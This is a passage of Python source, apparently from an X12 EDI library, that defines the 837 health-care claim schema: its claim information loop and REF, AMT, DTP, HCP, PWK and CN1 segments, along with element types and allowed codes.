desc="Mammography Certification Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referring Clinical Laboratory Improvement Amendment (CLIA) Facility Identification", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( 
desc="Immunization Batch Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["BT"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference 
Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "AMT", Properties( desc="Sales Tax Amount", position="4750", repeat="1", req_sit="S", syntax="" ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["T"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Postage Claimed Amount", position="4750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F4"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "K3", Properties( desc="File Information", position="4800", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Line Note", position="4850", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "DCP"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "NTE", Properties( desc="Third Party Organization 
Notes", position="4850", repeat="1", req_sit="S", syntax="", ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "PS1", Properties( desc="Purchased Service Information", position="4880", repeat="1", req_sit="S", syntax="", ), Element( "PS101", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "PS102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "PS103", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), ), Segment( "HCP", Properties( desc="Line Pricing/Repricing Information", position="4920", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", 
req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=9, codes=["ER", "HC", "IV", "WK"], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="S", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=11, codes=["MJ", "UN"], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2410, parsed_837_2420A, parsed_837_2420B, parsed_837_2420C, parsed_837_2420D, parsed_837_2420E, parsed_837_2420F, parsed_837_2420G, parsed_837_2420H, parsed_837_2430, parsed_837_2440, ) parsed_837_2300 = Loop( "2300", Properties( desc="Claim Information", looptype="", position="1300", repeat="100", req_sit="R", ), Segment( "CLM", Properties( desc="Claim Information", position="1300", repeat="1", req_sit="R", syntax="", ), Element( "CLM01", Properties( desc="Claim Submitter's Identifier", req_sit="R", data_type=("AN", "1", "38"), position=1, codes=[], ), ), Element( "CLM02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CLM03", Properties( desc="Claim Filing Indicator Code", req_sit="N", data_type=("ID", "1", "2"), position=3, codes=[], ), ), Element( "CLM04", Properties( desc="Non-Institutional Claim Type Code", 
req_sit="N", data_type=("ID", "1", "2"), position=4, codes=[], ), ), Composite( "C023", Properties( desc="Health Care Service Location Information", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CLM05-01", Properties( desc="Facility Code Value", req_sit="R", data_type=("AN", "1", "2"), position=0, codes=[], ), ), Element( "CLM05-02", Properties( desc="Facility Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["B"], ), ), Element( "CLM05-03", Properties( desc="Claim Frequency Type Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=[], ), ), ), Element( "CLM06", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["N", "Y"], ), ), Element( "CLM07", Properties( desc="Provider Accept Assignment Code", req_sit="R", data_type=("ID", "1", "1"), position=7, codes=["A", "B", "C"], ), ), Element( "CLM08", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["N", "W", "Y"], ), ), Element( "CLM09", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=9, codes=["I", "Y"], ), ), Element( "CLM10", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=10, codes=["P"], ), ), Composite( "C024", Properties( desc="Related Causes Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "CLM11-01", Properties( desc="Related-Causes Code", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-02", Properties( desc="Related-Causes Code", req_sit="S", data_type=("ID", "2", "3"), position=1, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-03", Properties( desc="Related-Causes Code", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "CLM11-04", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=3, 
codes=[], ), ), Element( "CLM11-05", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), ), Element( "CLM12", Properties( desc="Special Program Code", req_sit="S", data_type=("ID", "2", "3"), position=12, codes=["02", "03", "05", "09"], ), ), Element( "CLM13", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=13, codes=[], ), ), Element( "CLM14", Properties( desc="Level of Service Code", req_sit="N", data_type=("ID", "1", "3"), position=14, codes=[], ), ), Element( "CLM15", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=15, codes=[], ), ), Element( "CLM16", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "CLM17", Properties( desc="Claim Status Code", req_sit="N", data_type=("ID", "1", "2"), position=17, codes=[], ), ), Element( "CLM18", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=18, codes=[], ), ), Element( "CLM19", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=19, codes=[], ), ), Element( "CLM20", Properties( desc="Delay Reason Code", req_sit="S", data_type=("ID", "1", "2"), position=20, codes=["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "15"], ), ), ), Segment( "DTP", Properties( desc="Date - Onset of Current Illness or Symptom", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["431"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", 
Properties( desc="Date - Initial Treatment Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Acute Manifestation", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["453"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Accident", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["439"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", 
req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Menstrual Period", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["484"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Hearing and Vision Prescription Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Disability Dates", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["314", "360", "361"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", 
req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Worked", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["297"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Authorized Return to Work", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["296"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Admission", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["435"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Discharge", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, 
codes=["096"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Assumed and Relinquished Care Dates", position="1350", repeat="2", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["090", "091"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Property and Casualty Date of First Contact", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["444"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Repricer Received Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["050"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "PWK", Properties( desc="Claim Supplemental Information", position="1550", 
repeat="10", req_sit="S", syntax="P0506", ), Element( "PWK01", Properties( desc="Report Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "03", "04", "05", "06", "07", "08", "09", "10", "11", "13", "15", "21", "A3", "A4", "AM", "AS", "B2", "B3", "B4", "BR", "BS", "BT", "CB", "CK", "CT", "D2", "DA", "DB", "DG", "DJ", "DS", "EB", "HC", "HR", "I5", "IR", "LA", "M1", "MT", "NN", "OB", "OC", "OD", "OE", "OX", "OZ", "P4", "P5", "PE", "PN", "PO", "PQ", "PY", "PZ", "RB", "RR", "RT", "RX", "SG", "V5", "XP", ], ), ), Element( "PWK02", Properties( desc="Report Transmission Code", req_sit="R", data_type=("ID", "1", "2"), position=2, codes=["AA", "BM", "EL", "EM", "FT", "FX"], ), ), Element( "PWK03", Properties( desc="Report Copies Needed", req_sit="N", data_type=("N0", "1", "2"), position=3, codes=[], ), ), Element( "PWK04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "PWK05", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=5, codes=["AC"], ), ), Element( "PWK06", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=6, codes=[], ), ), Element( "PWK07", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=7, codes=[], ), ), Composite( "C002", Properties( desc="Actions Indicated", refdes="", repeat="", req_sit="N", seq="08" ), ), Element( "PWK09", Properties( desc="Request Category Code", req_sit="N", data_type=("ID", "1", "2"), position=9, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="1600", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", "09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( 
"CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "AMT", Properties( desc="Patient Amount Paid", position="1750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F5"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "REF", Properties( desc="Service Authorization Exception Code", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["4N"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mandatory Medicare (Section 4081) Crossover Indicator", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F5"], ), ), Element( "REF02", Properties( 
desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), 
Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Payer Claim Control Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9A"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", 
data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9C"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Investigational Device Exemption Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["LX"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Claim Identifier For Transmission Intermediaries", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D9"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], 
